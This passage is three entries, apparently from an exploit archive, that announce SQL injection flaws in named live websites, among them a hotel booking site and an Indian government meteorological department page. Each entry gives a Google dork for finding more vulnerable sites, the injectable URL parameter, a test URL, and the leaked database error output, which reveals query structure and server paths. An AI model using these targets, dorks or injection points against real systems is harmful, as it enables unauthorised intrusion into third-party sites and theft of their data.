  23. ################################################################################################# # Exploit Title : Hoteliraqua Todos los Derechos Reservados © 2013 SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 07/09/2018 # Vendor Homepage : hoteliraqua.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''www.hoteliraqua.com - Todos los Derechos Reservados © 2013'' # Exploit : /Reservas.php?id=[SQL Inj] ################################################################################################# # Example Site => hoteliraqua.com/Reservas.php?id=5%27 => [ Proof of Concept ] => archive.is/tOVc9 # SQL Database Error => Error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''5''' at line 1 SELECT `Content`,`Title`,`Menu` FROM site_web WHERE PageID = '5'' ################################################################################################# # Discovered By KingSkrupellos
  24. ################################################################################################# # Exploit Title : ReturnDates is under the care of (c) ThePopeRope SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 07/09/2018 # Vendor Homepage : returndates.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Returndates.com is under the care of (c) Thepoperope.'' # Exploit : /news.php?id=[SQL Inj] ################################################################################################# # Example Site => returndates.com/news.php?id=6122%27 # SQL Database Error => Warning: mysql_numrows() expects parameter 1 to be resource, boolean given in /mounted-storage/home63c/sub005/sc41041-ECUF/returndates.com/news.php on line 216 ################################################################################################# # Discovered By KingSkrupellos
  25. ################################################################################################# # Exploit Title : India Ministry of Earth Sciences Meteorological Department SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 07/09/2018 # Vendor Homepage : imd.gov.in # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Copyright © India Meteorological Department 2015 This Website belongs to India Meteorological Department, Ministry of Earth Sciences,Government of India'' # Exploit : /PATH/obs_network.php?id=[SQL Inj] ################################################################################################# # Example Site => imd.gov.in/pages/obs_network.php?id=16' => [ Proof of Concept ] => archive.is/zaH4f # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%') ORDER BY obs_name' at line 1 ################################################################################################# # Discovered By KingSkrupellos